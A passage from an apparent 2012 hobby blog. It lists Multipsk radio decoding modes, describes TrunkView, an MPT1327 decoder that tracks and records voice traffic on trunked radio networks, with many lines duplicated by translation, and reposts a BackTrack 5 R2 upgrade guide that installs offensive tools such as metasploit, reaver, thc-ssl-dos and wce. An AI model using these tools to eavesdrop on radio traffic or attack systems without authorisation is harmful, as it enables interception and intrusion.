    • DTMF, SELCAL
    • JT65 (A B and C)
    • LENTUS
    • COQUELET
  • Hellschreiber modes: FELD HELL / FM HELL(105-245) / PSK HELL / HELL 80
  • Graphic modes: HF FAX / SSTV / PSK SSTV modes (mentioned above) / MFSK16 SSTV (mentioned above)
  • DSP modes: Filters / Analysis / Binaural CW reception
  • RTTY, CW, BPSK31, BPSK63 and PSKFEC31 Panoramics
  • Identifiers: Video ID / RS ID / Call ID
  • TCP/IP digital modem
  • Integered SdR demodulator/modulator
  • To download just click here Multipsk + Clock 
  • for more detail go to the developer website F6CTE




Sunday, April 8, 2012

TRUNKVIEW The MPT1327 Protocol Decoder

TrunkView is an MPT1327 protocol decoder, used in a single radio setup without the need for a discriminator output.
MPT1327 Trunked Radio networks, such as the Belgium/Netherlands Entropia , can be tracked and monitored. MPT1327 Trunked Radio Networks, such as the Belgium / Netherlands Entropia , CAN be tracked and Monitored.


 


Features Features
  • Alpha tagging: label prefixes and individual radio idents. more... Alpha tagging: label prefixes and Individual radio idents. More ...
  • Tracking: if a suitable scanner is used, TrunkView tunes it to an assigned voice channel. Tracking: if a suitable scanner is used, TrunkView tunes it to an assigned voice channel.
  • Voice channels assigned by the Trunking System Controller are shown in a separate window. Voice channels assigned by the Trunking System Controller are shown in a separate window.
  • Custom bandplan support. more... Custom bandplan Support. More ...
  • Short Data Message decoding. Short Data Message decoding.
  • Real time Traffic analysis tool. more... Real time Traffic Analysis tool. More ...
  • Option to create logfiles. Option to create logfiles.
  • Option to record voice conversations (WAV only). Option to record voice conversations (WAV only).
  • Extensive filter possibilities. Extensive filter possibilities.
  • Band scan facility. Band scan facility.
  • Minimizes to the system tray. Minimizes to the system tray.
  • No discriminator output needed. No discriminator output needed.
  • Network configuration: System id, Site name, Control Channel. Network configuration: System id, Site name, Control Channel.

Technical Technical
TrunkView uses (software) algorithms that are made available by Stefan Petersen © 2003. TrunkView uses (software) algorithms that are made available by Stefan Petersen © 2003.
For any MPT1327 protocol related question, you can refer to the protocol standard . For any MPT1327 Protocol related question, you CAN refer to the Standard Protocol . (about 290 pages!) (About 290 pages!)

Developer site linito.net download here TrunkView v2.21
 
this is an old system trunking but its still used until today .....happy hunting!!!

Wednesday, February 29, 2012

Upgrading to BackTrack 5 R2

The long awaited release of the BackTrack 5 R2 kernel has arrived, and it’s now available in our repositories. With a spanking brand new 3.2.6 kernel, a huge array of new and updated tools and security fixes, BT5 R2 will provide a more stable and complete penetration testing environment than ever before. We will start a series of blog posts on how to upgrade, deal with VMWare, and even build your own updated BT5 R2 by yourself. For now though, here’s how to get the new kernel and all of the updated goodness:

1. Update and upgrade your BT5 (R1) installation:

apt-get update
apt-get dist-upgrade
apt-get install beef
reboot

Once that’s done, you should already have the new kernel installed as well as any last updates we have for the official R2 release. You need to reboot to have the 3.2.6 kernel kick in.

2. OPTIONAL – Once rebooted, log back in, and get your pretty splash screen back.

fix-splash
reboot

On the next reboot, you should see the red console splash screen appear.

3. Verify that you are running a 3.2.6 kernel:

uname -a

You should see something like “Linux bt 3.2.6 …”

4. Feel free to install any or all of the new tools featured in BackTrack 5 R2:

apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef

5. Add the new security updates repository to /etc/apt/sources.list, and run another upgrade.

echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade

During the last upgrade you’ll be asked about file revision updates. Make sure to always keep the locally installed file. Feel free to press “Enter” and accept all the defaults.

6. Some of the newly installed services will be set to start on boot. We like disabling these as needed:

/etc/init.d/apache2 stop
/etc/init.d/cups stop
/etc/init.d/winbind stop

update-rc.d -f cups remove
update-rc.d -f apache2 remove
update-rc.d -f winbind remove

And…you’re done! Expect a more comprehensive introduction to BT5 R2, on the day of the Official release – March 1st! The BackTrack 5 R2 ISOS will we available for download from our site on March 1st via Torrent only. HTTP links will be added a few days later. Thanks to the BackTrack-Linux.org team for more detail go to the website. Happy Hunting!!